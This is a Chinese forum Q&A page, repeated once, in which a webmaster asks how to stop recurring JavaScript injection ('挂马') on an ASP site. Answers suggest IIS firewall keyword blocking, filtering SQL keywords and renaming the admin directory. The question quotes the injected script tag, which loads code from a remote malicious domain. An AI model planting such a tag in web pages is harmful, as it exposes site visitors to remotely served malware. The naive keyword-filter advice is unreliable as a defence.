asp网站被JS挂马,怎么防范处理!
日期:2014-05-17 浏览次数:20790 次
asp网站被JS挂马,如何防范处理!!???
asp编写的网站,不停被挂马。如代码:<script language="javascript" src="http://ddv.sarl.tk/asd.js?s=201&col=ffdd00"></script>
请问如何处理?如何防范再被挂马??
------解决方案--------------------
可以在服务器里 安装一个 iis防火墙
1 把 ddv.sarl.tk 设置为 post 拦截关键字,阻止被再次通过 post 方式发送到你的网站里
2 把 <script language="javascript" src="http://ddv.sarl.tk/asd.js?s=201&col=ffdd00"> </script>
这个 作为替换关键字,替换为 空 ,从 iis里给清除掉.这个可以解决网站被反复"挂马"
可以到 http://www.zcnt.com/guama.asp 下载iis防火墙软件。
------解决方案--------------------
防注入。
对提交的数据进行验证,禁止AND OR SELECT UPDATE等关建词的输入
------解决方案--------------------
把后台管理目录不要 写成 admin
asp编写的网站,不停被挂马。如代码:<script language="javascript" src="http://ddv.sarl.tk/asd.js?s=201&col=ffdd00"></script>
请问如何处理?如何防范再被挂马??
------解决方案--------------------
可以在服务器里 安装一个 iis防火墙
1 把 ddv.sarl.tk 设置为 post 拦截关键字,阻止被再次通过 post 方式发送到你的网站里
2 把 <script language="javascript" src="http://ddv.sarl.tk/asd.js?s=201&col=ffdd00"> </script>
这个 作为替换关键字,替换为 空 ,从 iis里给清除掉.这个可以解决网站被反复"挂马"
可以到 http://www.zcnt.com/guama.asp 下载iis防火墙软件。
------解决方案--------------------
防注入。
对提交的数据进行验证,禁止AND OR SELECT UPDATE等关建词的输入
------解决方案--------------------
把后台管理目录不要 写成 admin
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
